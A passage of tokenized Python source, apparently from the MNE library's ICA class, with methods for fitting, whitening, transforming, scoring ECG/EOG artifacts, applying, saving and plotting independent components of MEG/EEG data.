raw , start , stop ) <EOL> data = raw [ picks , start : stop ] [ <NUM_LIT:0> ] <EOL> if decim is not None : <EOL> data = data [ : , : : decim ] <EOL> if ( reject is not None ) or ( flat is not None ) : <EOL> data , self . drop_inds_ = _reject_data_segments ( data , reject , flat , <EOL> decim , self . info , <EOL> tstep ) <EOL> self . n_samples_ = data . shape [ <NUM_LIT:1> ] <EOL> data , self . _pre_whitener = self . _pre_whiten ( data , raw . info , picks ) <EOL> self . _fit ( data , self . max_pca_components , '<STR_LIT>' ) <EOL> return self <EOL> def _fit_epochs ( self , epochs , picks , decim , verbose ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit != '<STR_LIT>' : <EOL> self . _reset ( ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( epochs . info , exclude = '<STR_LIT>' , <EOL> with_ref_meg = False ) <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' % len ( picks ) ) <EOL> self . info = pick_info ( epochs . info , picks ) <EOL> if self . info [ '<STR_LIT>' ] : <EOL> self . info [ '<STR_LIT>' ] = [ ] <EOL> self . ch_names = self . info [ '<STR_LIT>' ] <EOL> if self . max_pca_components is None : <EOL> self . max_pca_components = len ( picks ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> data = epochs . get_data ( ) [ : , picks ] <EOL> if decim is not None : <EOL> data = data [ : , : , : : decim ] <EOL> self . n_samples_ = np . prod ( data [ : , <NUM_LIT:0> , : ] . shape ) <EOL> data , self . _pre_whitener = self . _pre_whiten ( np . hstack ( data ) , epochs . info , picks ) <EOL> self . _fit ( data , self . max_pca_components , '<STR_LIT>' ) <EOL> return self <EOL> def _pre_whiten ( self , data , info , picks ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> has_pre_whitener = hasattr ( self , '<STR_LIT>' ) <EOL> if not has_pre_whitener and self . noise_cov is None : <EOL> info = pick_info ( info , picks ) <EOL> pre_whitener = np . empty ( [ len ( data ) , <NUM_LIT:1> ] ) <EOL> for ch_type in _DATA_CH_TYPES_SPLIT : <EOL> if _contains_ch_type ( info , ch_type ) : <EOL> if ch_type == '<STR_LIT>' : <EOL> this_picks = pick_types ( info , meg = False , seeg = True ) <EOL> elif ch_type == '<STR_LIT>' : <EOL> this_picks = pick_types ( info , meg = False , ecog = True ) <EOL> elif ch_type == '<STR_LIT>' : <EOL> this_picks = pick_types ( info , meg = False , eeg = True ) <EOL> else : <EOL> this_picks = pick_types ( info , meg = ch_type ) <EOL> pre_whitener [ this_picks ] = np . std ( data [ this_picks ] ) <EOL> data /= pre_whitener <EOL> elif not has_pre_whitener and self . noise_cov is not None : <EOL> pre_whitener , _ = compute_whitener ( self . noise_cov , info , picks ) <EOL> assert data . shape [ <NUM_LIT:0> ] == pre_whitener . shape [ <NUM_LIT:1> ] <EOL> data = fast_dot ( pre_whitener , data ) <EOL> elif has_pre_whitener and self . noise_cov is None : <EOL> data /= self . _pre_whitener <EOL> pre_whitener = self . _pre_whitener <EOL> else : <EOL> data = fast_dot ( self . _pre_whitener , data ) <EOL> pre_whitener = self . _pre_whitener <EOL> return data , pre_whitener <EOL> def _fit ( self , data , max_pca_components , fit_type ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . decomposition import RandomizedPCA <EOL> random_state = check_random_state ( self . random_state ) <EOL> pca = RandomizedPCA ( n_components = max_pca_components , whiten = True , <EOL> copy = True , random_state = random_state ) <EOL> if isinstance ( self . n_components , float ) : <EOL> full_var = np . var ( data , axis = <NUM_LIT:1> ) . sum ( ) <EOL> data = pca . fit_transform ( data . T ) <EOL> if isinstance ( self . n_components , float ) : <EOL> explained_variance_ratio_ = pca . explained_variance_ / full_var <EOL> n_components_ = np . sum ( explained_variance_ratio_ . cumsum ( ) <= <EOL> self . n_components ) <EOL> if n_components_ < <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' % <EOL> n_components_ ) <EOL> sel = slice ( n_components_ ) <EOL> else : <EOL> if self . n_components is not None : <EOL> sel = slice ( self . n_components ) <EOL> logger . info ( '<STR_LIT>' % <EOL> self . n_components ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' <EOL> % len ( pca . components_ ) ) <EOL> sel = slice ( len ( pca . components_ ) ) <EOL> self . pca_mean_ = pca . mean_ <EOL> self . pca_components_ = pca . components_ <EOL> self . pca_explained_variance_ = exp_var = pca . explained_variance_ <EOL> self . pca_components_ *= np . sqrt ( exp_var [ : , None ] ) <EOL> del pca <EOL> self . n_components_ = sel . stop <EOL> if self . n_pca_components is not None : <EOL> if self . n_pca_components > len ( self . pca_components_ ) : <EOL> self . n_pca_components = len ( self . pca_components_ ) <EOL> if self . method == '<STR_LIT>' : <EOL> from sklearn . decomposition import FastICA <EOL> ica = FastICA ( whiten = False , <EOL> random_state = random_state , ** self . fit_params ) <EOL> ica . fit ( data [ : , sel ] ) <EOL> self . unmixing_matrix_ = getattr ( ica , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> elif self . method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . unmixing_matrix_ = infomax ( data [ : , sel ] , <EOL> random_state = random_state , <EOL> ** self . fit_params ) <EOL> self . unmixing_matrix_ /= np . sqrt ( exp_var [ sel ] ) [ None , : ] <EOL> self . mixing_matrix_ = linalg . pinv ( self . unmixing_matrix_ ) <EOL> self . current_fit = fit_type <EOL> def _transform ( self , data ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> if self . pca_mean_ is not None : <EOL> data -= self . pca_mean_ [ : , None ] <EOL> pca_data = fast_dot ( self . pca_components_ [ : self . n_components_ ] , data ) <EOL> sources = fast_dot ( self . unmixing_matrix_ , pca_data ) <EOL> return sources <EOL> def _transform_raw ( self , raw , start , stop ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> picks = pick_types ( raw . info , include = self . ch_names , exclude = '<STR_LIT>' , <EOL> meg = False , ref_meg = False ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> data , _ = self . _pre_whiten ( raw [ picks , start : stop ] [ <NUM_LIT:0> ] , raw . info , picks ) <EOL> return self . _transform ( data ) <EOL> def _transform_epochs ( self , epochs , concatenate ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> picks = pick_types ( epochs . info , include = self . ch_names , exclude = '<STR_LIT>' , <EOL> meg = False , ref_meg = False ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> data = np . hstack ( epochs . get_data ( ) [ : , picks ] ) <EOL> data , _ = self . _pre_whiten ( data , epochs . info , picks ) <EOL> sources = self . _transform ( data ) <EOL> if not concatenate : <EOL> sources = np . array ( np . split ( sources , len ( epochs . events ) , <NUM_LIT:1> ) ) <EOL> return sources <EOL> def _transform_evoked ( self , evoked ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> picks = pick_types ( evoked . info , include = self . ch_names , exclude = '<STR_LIT>' , <EOL> meg = False , ref_meg = False ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> data , _ = self . _pre_whiten ( evoked . data [ picks ] , evoked . info , picks ) <EOL> sources = self . _transform ( data ) <EOL> return sources <EOL> def get_sources ( self , inst , add_channels = None , start = None , stop = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> sources = self . _sources_as_raw ( inst , add_channels , start , stop ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> sources = self . _sources_as_epochs ( inst , add_channels , False ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> sources = self . _sources_as_evoked ( inst , add_channels ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT:type>' ) <EOL> return sources <EOL> def _sources_as_raw ( self , raw , add_channels , start , stop ) : <EOL> """<STR_LIT>""" <EOL> sources = self . _transform_raw ( raw , start = start , stop = stop ) <EOL> if raw . preload : <EOL> data = raw . _data <EOL> del raw . _data <EOL> out = raw . copy ( ) <EOL> if raw . preload : <EOL> raw . _data = data <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> if add_channels is not None : <EOL> raw_picked = raw . copy ( ) . pick_channels ( add_channels ) <EOL> data_ , times_ = raw_picked [ : , start : stop ] <EOL> data_ = np . r_ [ sources , data_ ] <EOL> else : <EOL> data_ = sources <EOL> _ , times_ = raw [ <NUM_LIT:0> , start : stop ] <EOL> out . _data = data_ <EOL> out . _times = times_ <EOL> out . _filenames = list ( ) <EOL> out . preload = True <EOL> out . _first_samps = np . array ( [ raw . first_samp + <EOL> ( start if start else <NUM_LIT:0> ) ] ) <EOL> out . _last_samps = np . array ( [ out . first_samp + stop <EOL> if stop else raw . last_samp ] ) <EOL> out . _projector = None <EOL> self . _export_info ( out . info , raw , add_channels ) <EOL> out . _update_times ( ) <EOL> return out <EOL> def _sources_as_epochs ( self , epochs , add_channels , concatenate ) : <EOL> """<STR_LIT>""" <EOL> out = epochs . copy ( ) <EOL> sources = self . _transform_epochs ( epochs , concatenate ) <EOL> if add_channels is not None : <EOL> picks = [ epochs . ch_names . index ( k ) for k in add_channels ] <EOL> else : <EOL> picks = [ ] <EOL> out . _data = np . concatenate ( [ sources , epochs . get_data ( ) [ : , picks ] ] , <EOL> axis = <NUM_LIT:1> ) if len ( picks ) > <NUM_LIT:0> else sources <EOL> self . _export_info ( out . info , epochs , add_channels ) <EOL> out . preload = True <EOL> out . _raw = None <EOL> out . _projector = None <EOL> return out <EOL> def _sources_as_evoked ( self , evoked , add_channels ) : <EOL> """<STR_LIT>""" <EOL> if add_channels is not None : <EOL> picks = [ evoked . ch_names . index ( k ) for k in add_channels ] <EOL> else : <EOL> picks = [ ] <EOL> sources = self . _transform_evoked ( evoked ) <EOL> if len ( picks ) > <NUM_LIT:1> : <EOL> data = np . r_ [ sources , evoked . data [ picks ] ] <EOL> else : <EOL> data = sources <EOL> out = evoked . copy ( ) <EOL> out . data = data <EOL> self . _export_info ( out . info , evoked , add_channels ) <EOL> return out <EOL> def _export_info ( self , info , container , add_channels ) : <EOL> """<STR_LIT>""" <EOL> ch_names = [ ] <EOL> ch_info = info [ '<STR_LIT>' ] = [ ] <EOL> for ii in range ( self . n_components_ ) : <EOL> this_source = '<STR_LIT>' % ( ii + <NUM_LIT:1> ) <EOL> ch_names . append ( this_source ) <EOL> ch_info . append ( dict ( ch_name = this_source , cal = <NUM_LIT:1> , <EOL> logno = ii + <NUM_LIT:1> , coil_type = FIFF . FIFFV_COIL_NONE , <EOL> kind = FIFF . FIFFV_MISC_CH , <EOL> coord_Frame = FIFF . FIFFV_COORD_UNKNOWN , <EOL> loc = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> ] * <NUM_LIT:3> , dtype = '<STR_LIT>' ) , <EOL> unit = FIFF . FIFF_UNIT_NONE , <EOL> range = <NUM_LIT:1.0> , scanno = ii + <NUM_LIT:1> , unit_mul = <NUM_LIT:0> ) ) <EOL> if add_channels is not None : <EOL> ch_names += add_channels <EOL> ch_info += [ k for k in container . info [ '<STR_LIT>' ] if k [ '<STR_LIT>' ] in <EOL> add_channels ] <EOL> info [ '<STR_LIT>' ] = [ ch_names [ k ] for k in self . exclude ] <EOL> info [ '<STR_LIT>' ] = [ ] <EOL> info . _update_redundant ( ) <EOL> info . _check_consistency ( ) <EOL> @ verbose <EOL> def score_sources ( self , inst , target = None , score_func = '<STR_LIT>' , <EOL> start = None , stop = None , l_freq = None , h_freq = None , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> sources = self . _transform_raw ( inst , start , stop ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> sources = self . _transform_epochs ( inst , concatenate = True ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> sources = self . _transform_evoked ( inst ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if target is not None : <EOL> target = self . _check_target ( target , inst , start , stop ) <EOL> if sources . shape [ - <NUM_LIT:1> ] != target . shape [ - <NUM_LIT:1> ] : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if verbose is None : <EOL> verbose = self . verbose <EOL> if isinstance ( inst , ( _BaseRaw , _BaseRaw ) ) : <EOL> sources , target = _band_pass_filter ( self , sources , target , <EOL> l_freq , h_freq , verbose ) <EOL> scores = _find_sources ( sources , target , score_func ) <EOL> return scores <EOL> def _check_target ( self , target , inst , start , stop ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> start , stop = _check_start_stop ( inst , start , stop ) <EOL> if hasattr ( target , '<STR_LIT>' ) : <EOL> if target . ndim < <NUM_LIT:2> : <EOL> target = target . reshape ( <NUM_LIT:1> , target . shape [ - <NUM_LIT:1> ] ) <EOL> if isinstance ( target , string_types ) : <EOL> pick = _get_target_ch ( inst , target ) <EOL> target , _ = inst [ pick , start : stop ] <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> if isinstance ( target , string_types ) : <EOL> pick = _get_target_ch ( inst , target ) <EOL> target = inst . get_data ( ) [ : , pick ] <EOL> if hasattr ( target , '<STR_LIT>' ) : <EOL> if target . ndim == <NUM_LIT:3> and min ( target . shape ) == <NUM_LIT:1> : <EOL> target = target . ravel ( ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> if isinstance ( target , string_types ) : <EOL> pick = _get_target_ch ( inst , target ) <EOL> target = inst . data [ pick ] <EOL> return target <EOL> @ verbose <EOL> def find_bads_ecg ( self , inst , ch_name = None , threshold = None , <EOL> start = None , stop = None , l_freq = <NUM_LIT:8> , h_freq = <NUM_LIT:16> , <EOL> method = '<STR_LIT>' , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if verbose is None : <EOL> verbose = self . verbose <EOL> idx_ecg = _get_ecg_channel_index ( ch_name , inst ) <EOL> if idx_ecg is None : <EOL> if verbose is not None : <EOL> verbose = self . verbose <EOL> ecg , times = _make_ecg ( inst , start , stop , verbose ) <EOL> ch_name = '<STR_LIT>' <EOL> else : <EOL> ecg = inst . ch_names [ idx_ecg ] <EOL> if inst . ch_names != self . ch_names : <EOL> extra_picks = pick_types ( inst . info , meg = False , ecg = True ) <EOL> ch_names_to_pick = ( self . ch_names + <EOL> [ inst . ch_names [ k ] for k in extra_picks ] ) <EOL> inst = inst . copy ( ) . pick_channels ( ch_names_to_pick ) <EOL> if method == '<STR_LIT>' : <EOL> if threshold is None : <EOL> threshold = <NUM_LIT> <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> sources = self . get_sources ( create_ecg_epochs ( inst ) ) . get_data ( ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> sources = self . get_sources ( inst ) . get_data ( ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _ , p_vals , _ = ctps ( sources ) <EOL> scores = p_vals . max ( - <NUM_LIT:1> ) <EOL> ecg_idx = np . where ( scores >= threshold ) [ <NUM_LIT:0> ] <EOL> elif method == '<STR_LIT>' : <EOL> if threshold is None : <EOL> threshold = <NUM_LIT> <EOL> scores = self . score_sources ( inst , target = ecg , <EOL> score_func = '<STR_LIT>' , <EOL> start = start , stop = stop , <EOL> l_freq = l_freq , h_freq = h_freq , <EOL> verbose = verbose ) <EOL> ecg_idx = find_outliers ( scores , threshold = threshold ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % method ) <EOL> ecg_idx = ecg_idx [ np . abs ( scores [ ecg_idx ] ) . argsort ( ) [ : : - <NUM_LIT:1> ] ] <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . labels_ = dict ( ) <EOL> self . labels_ [ '<STR_LIT>' ] = list ( ecg_idx ) <EOL> self . labels_ [ '<STR_LIT>' % ch_name ] = list ( ecg_idx ) <EOL> return self . labels_ [ '<STR_LIT>' ] , scores <EOL> @ verbose <EOL> def find_bads_eog ( self , inst , ch_name = None , threshold = <NUM_LIT> , <EOL> start = None , stop = None , l_freq = <NUM_LIT:1> , h_freq = <NUM_LIT:10> , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if verbose is None : <EOL> verbose = self . verbose <EOL> eog_inds = _get_eog_channel_index ( ch_name , inst ) <EOL> if len ( eog_inds ) > <NUM_LIT:2> : <EOL> eog_inds = eog_inds [ : <NUM_LIT:1> ] <EOL> logger . info ( '<STR_LIT>' % inst . ch_names [ eog_inds [ <NUM_LIT:0> ] ] ) <EOL> scores , eog_idx = [ ] , [ ] <EOL> eog_chs = [ inst . ch_names [ k ] for k in eog_inds ] <EOL> targets = [ self . _check_target ( k , inst , start , stop ) for k in eog_chs ] <EOL> if inst . ch_names != self . ch_names : <EOL> inst = inst . copy ( ) . pick_channels ( self . ch_names ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . labels_ = dict ( ) <EOL> for ii , ( eog_ch , target ) in enumerate ( zip ( eog_chs , targets ) ) : <EOL> scores += [ self . score_sources ( inst , target = target , <EOL> score_func = '<STR_LIT>' , <EOL> start = start , stop = stop , <EOL> l_freq = l_freq , h_freq = h_freq , <EOL> verbose = verbose ) ] <EOL> this_idx = find_outliers ( scores [ - <NUM_LIT:1> ] , threshold = threshold ) <EOL> eog_idx += [ this_idx ] <EOL> self . labels_ [ ( '<STR_LIT>' % ii ) + eog_ch ] = list ( this_idx ) <EOL> scores_ = np . concatenate ( [ scores [ ii ] [ inds ] <EOL> for ii , inds in enumerate ( eog_idx ) ] ) <EOL> eog_idx_ = np . concatenate ( eog_idx ) [ np . abs ( scores_ ) . argsort ( ) [ : : - <NUM_LIT:1> ] ] <EOL> eog_idx_unique = list ( np . unique ( eog_idx_ ) ) <EOL> eog_idx = [ ] <EOL> for i in eog_idx_ : <EOL> if i in eog_idx_unique : <EOL> eog_idx . append ( i ) <EOL> eog_idx_unique . remove ( i ) <EOL> if len ( scores ) == <NUM_LIT:1> : <EOL> scores = scores [ <NUM_LIT:0> ] <EOL> self . labels_ [ '<STR_LIT>' ] = list ( eog_idx ) <EOL> return self . labels_ [ '<STR_LIT>' ] , scores <EOL> def apply ( self , inst , include = None , exclude = None , <EOL> n_pca_components = None , start = None , stop = None , <EOL> copy = None ) : <EOL> """<STR_LIT>""" <EOL> inst = _check_copy_dep ( inst , copy ) <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> out = self . _apply_raw ( raw = inst , include = include , <EOL> exclude = exclude , <EOL> n_pca_components = n_pca_components , <EOL> start = start , stop = stop ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> out = self . _apply_epochs ( epochs = inst , include = include , <EOL> exclude = exclude , <EOL> n_pca_components = n_pca_components ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> out = self . _apply_evoked ( evoked = inst , include = include , <EOL> exclude = exclude , <EOL> n_pca_components = n_pca_components ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT:type>' ) <EOL> return out <EOL> def _apply_raw ( self , raw , include , exclude , n_pca_components , start , stop ) : <EOL> """<STR_LIT>""" <EOL> if not raw . preload : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if exclude is None : <EOL> exclude = list ( set ( self . exclude ) ) <EOL> else : <EOL> exclude = list ( set ( self . exclude + exclude ) ) <EOL> if n_pca_components is not None : <EOL> self . n_pca_components = n_pca_components <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> picks = pick_types ( raw . info , meg = False , include = self . ch_names , <EOL> exclude = '<STR_LIT>' , ref_meg = False ) <EOL> data = raw [ picks , start : stop ] [ <NUM_LIT:0> ] <EOL> data , _ = self . _pre_whiten ( data , raw . info , picks ) <EOL> data = self . _pick_sources ( data , include , exclude ) <EOL> raw [ picks , start : stop ] = data <EOL> return raw <EOL> def _apply_epochs ( self , epochs , include , exclude , n_pca_components ) : <EOL> if not epochs . preload : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> picks = pick_types ( epochs . info , meg = False , ref_meg = False , <EOL> include = self . ch_names , <EOL> exclude = '<STR_LIT>' ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> if n_pca_components is not None : <EOL> self . n_pca_components = n_pca_components <EOL> data = np . hstack ( epochs . get_data ( ) [ : , picks ] ) <EOL> data , _ = self . _pre_whiten ( data , epochs . info , picks ) <EOL> data = self . _pick_sources ( data , include = include , exclude = exclude ) <EOL> epochs . _data [ : , picks ] = np . array ( np . split ( data , <EOL> len ( epochs . events ) , <NUM_LIT:1> ) ) <EOL> epochs . preload = True <EOL> return epochs <EOL> def _apply_evoked ( self , evoked , include , exclude , n_pca_components ) : <EOL> picks = pick_types ( evoked . info , meg = False , ref_meg = False , <EOL> include = self . ch_names , <EOL> exclude = '<STR_LIT>' ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> if n_pca_components is not None : <EOL> self . n_pca_components = n_pca_components <EOL> data = evoked . data [ picks ] <EOL> data , _ = self . _pre_whiten ( data , evoked . info , picks ) <EOL> data = self . _pick_sources ( data , include = include , <EOL> exclude = exclude ) <EOL> evoked . data [ picks ] = data <EOL> return evoked <EOL> def _pick_sources ( self , data , include , exclude ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> if exclude is None : <EOL> exclude = self . exclude <EOL> else : <EOL> exclude = list ( set ( self . exclude + list ( exclude ) ) ) <EOL> _n_pca_comp = self . _check_n_pca_components ( self . n_pca_components ) <EOL> if not ( self . n_components_ <= _n_pca_comp <= self . max_pca_components ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> n_components = self . n_components_ <EOL> logger . info ( '<STR_LIT>' % n_components ) <EOL> if self . pca_mean_ is not None : <EOL> data -= self . pca_mean_ [ : , None ] <EOL> sel_keep = np . arange ( n_components ) <EOL> if include not in ( None , [ ] ) : <EOL> sel_keep = np . unique ( include ) <EOL> elif exclude not in ( None , [ ] ) : <EOL> sel_keep = np . setdiff1d ( np . arange ( n_components ) , exclude ) <EOL> logger . info ( '<STR_LIT>' <EOL> % ( n_components - len ( sel_keep ) ) ) <EOL> unmixing = np . eye ( _n_pca_comp ) <EOL> unmixing [ : n_components , : n_components ] = self . unmixing_matrix_ <EOL> unmixing = np . dot ( unmixing , self . pca_components_ [ : _n_pca_comp ] ) <EOL> mixing = np . eye ( _n_pca_comp ) <EOL> mixing [ : n_components , : n_components ] = self . mixing_matrix_ <EOL> mixing = np . dot ( self . pca_components_ [ : _n_pca_comp ] . T , mixing ) <EOL> if _n_pca_comp > n_components : <EOL> sel_keep = np . concatenate ( <EOL> ( sel_keep , range ( n_components , _n_pca_comp ) ) ) <EOL> proj_mat = np . dot ( mixing [ : , sel_keep ] , unmixing [ sel_keep , : ] ) <EOL> data = fast_dot ( proj_mat , data ) <EOL> if self . pca_mean_ is not None : <EOL> data += self . pca_mean_ [ : , None ] <EOL> if self . noise_cov is None : <EOL> data *= self . _pre_whitener <EOL> else : <EOL> data = fast_dot ( linalg . pinv ( self . _pre_whitener ) , data ) <EOL> return data <EOL> @ verbose <EOL> def save ( self , fname ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit == '<STR_LIT>' : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> check_fname ( fname , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> logger . info ( '<STR_LIT>' % fname ) <EOL> fid = start_file ( fname ) <EOL> try : <EOL> _write_ica ( fid , self ) <EOL> except Exception : <EOL> os . remove ( fname ) <EOL> raise <EOL> end_file ( fid ) <EOL> return self <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return deepcopy ( self ) <EOL> def plot_components ( self , picks = None , ch_type = None , res = <NUM_LIT:64> , layout = None , <EOL> vmin = None , vmax = None , cmap = '<STR_LIT>' , sensors = True , <EOL> colorbar = False , title = None , show = True , outlines = '<STR_LIT>' , <EOL> contours = <NUM_LIT:6> , image_interp = '<STR_LIT>' , head_pos = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_components ( self , picks = picks , <EOL> ch_type = ch_type , <EOL> res = res , layout = layout , vmax = vmax , <EOL> cmap = cmap , <EOL> sensors = sensors , colorbar = colorbar , <EOL> title = title , show = show , <EOL> outlines = outlines , contours = contours , <EOL> image_interp = image_interp , <EOL> head_pos = head_pos ) <EOL> def plot_sources ( self , inst , picks = None , exclude = None , start = None , <EOL> stop = None , title = None , show = True , block = False ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_sources ( self , inst = inst , picks = picks , exclude = exclude , <EOL> title = title , start = start , stop = stop , show = show , <EOL> block = block ) <EOL> def plot_scores ( self , scores , exclude = None , labels = None , axhline = None , <EOL> title = '<STR_LIT>' , figsize = ( <NUM_LIT:12> , <NUM_LIT:6> ) , <EOL> show = True ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_scores ( <EOL> ica = self , scores = scores , exclude = exclude , labels = labels , <EOL> axhline = axhline , title = title , figsize = figsize , show = show ) <EOL> def plot_overlay ( self , inst , exclude = None , picks = None , start = None , <EOL> stop = None , title = None , show = True ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_overlay ( self , inst = inst , exclude = exclude , picks = picks , <EOL> start = start , stop = stop , title = title , show = show ) <EOL> def detect_artifacts ( self , raw , start_find = None , stop_find = None , <EOL> ecg_ch = None , ecg_score_func = '<STR_LIT>' , <EOL> ecg_criterion = <NUM_LIT:0.1> , eog_ch = None , <EOL> eog_score_func = '<STR_LIT>' , <EOL> eog_criterion = <NUM_LIT:0.1> , skew_criterion = - <NUM_LIT:1> , <EOL> kurt_criterion = - <NUM_LIT:1> , var_criterion = <NUM_LIT:0> , <EOL> add_nodes = None ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> _detect_artifacts ( self , raw = raw , start_find = start_find , <EOL> stop_find = stop_find , ecg_ch = ecg_ch , <EOL> ecg_score_func = ecg_score_func , <EOL> ecg_criterion = ecg_criterion , <EOL> eog_ch = eog_ch , eog_score_func = eog_score_func , <EOL> eog_criterion = eog_criterion , <EOL> skew_criterion = skew_criterion , <EOL> kurt_criterion = kurt_criterion , <EOL> var_criterion = var_criterion , <EOL> add_nodes = add_nodes ) <EOL> return self <EOL> @ verbose <EOL> def _check_n_pca_components ( self , _n_pca_comp , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( _n_pca_comp , float ) : <EOL> _n_pca_comp = ( ( self . pca_explained_variance_ / <EOL> self . pca_explained_variance_ . sum ( ) ) . cumsum ( ) <= <EOL> _n_pca_comp ) . sum ( ) <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' % _n_pca_comp ) <EOL> elif _n_pca_comp is None : <EOL> _n_pca_comp = self . max_pca_components <EOL> elif _n_pca_comp < self . n_components_ : <EOL> _n_pca_comp = self . n_components_ <EOL> return _n_pca_comp <EOL> def _check_start_stop ( raw , start , stop ) : <EOL> """<STR_LIT>""" <EOL> return [ c if ( isinstance ( c , int ) or c is None ) else <EOL> raw . time_as_index ( c ) [ <NUM_LIT:0> ] for c in ( start , stop ) ] <EOL> @ verbose <EOL> def ica_find_ecg_events ( raw , ecg_source , event_id = <NUM_LIT> , <EOL> tstart = <NUM_LIT:0.0> , l_freq = <NUM_LIT:5> , h_freq = <NUM_LIT> , qrs_threshold = '<STR_LIT>' , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> ecg_events = qrs_detector ( raw . info [ '<STR_LIT>' ] , ecg_source . ravel ( ) , <EOL> tstart = tstart , thresh_value = qrs_threshold , <EOL> l_freq = l_freq , h_freq = h_freq ) <EOL> n_events = len ( ecg_events ) <EOL> ecg_events = np . c_ [ ecg_events + raw . first_samp , np . zeros ( n_events ) , <EOL> event_id * np . ones ( n_events ) ] <EOL> return ecg_events <EOL> @ verbose <EOL> def ica_find_eog_events ( raw , eog_source = None , event_id = <NUM_LIT> , l_freq = <NUM_LIT:1> , <EOL> h_freq = <NUM_LIT:10> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> eog_events = _find_eog_events ( eog_source [ np . newaxis ] , event_id = event_id , <EOL> l_freq = l_freq , h_freq = h_freq 